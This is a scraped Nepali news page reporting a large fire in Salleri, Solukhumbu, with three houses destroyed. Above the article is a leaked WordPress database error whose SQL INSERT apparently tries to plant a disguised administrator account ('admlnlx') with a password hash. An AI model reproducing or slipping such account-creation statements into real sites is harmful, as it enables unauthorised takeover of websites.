WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BT8TPKVEC.OcYYqBPLlmt70m95oJaj.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 07:49:31', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु, मंसिर २३ –
सोलुखुम्बुको सदरमुकाम सल्लेरीमा अहिले ठूलो आगलागी भइरहेको छ ।
केहीबेरअघि जिल्ला कारागार नजिकै रहेको मिनाक्षी होटलबाट फैलन सुरु भएको यो आगलागीबाट अहिलेसम्म तीनवटा घर पूर्णतः ध्वस्त भइसकेका छन् ।
आगोलाई नियन्त्रणमा लिन स्थानीयवासी, जिल्ला प्रहरी र नेपाली सेना जुटिरहेका छन् । – रासस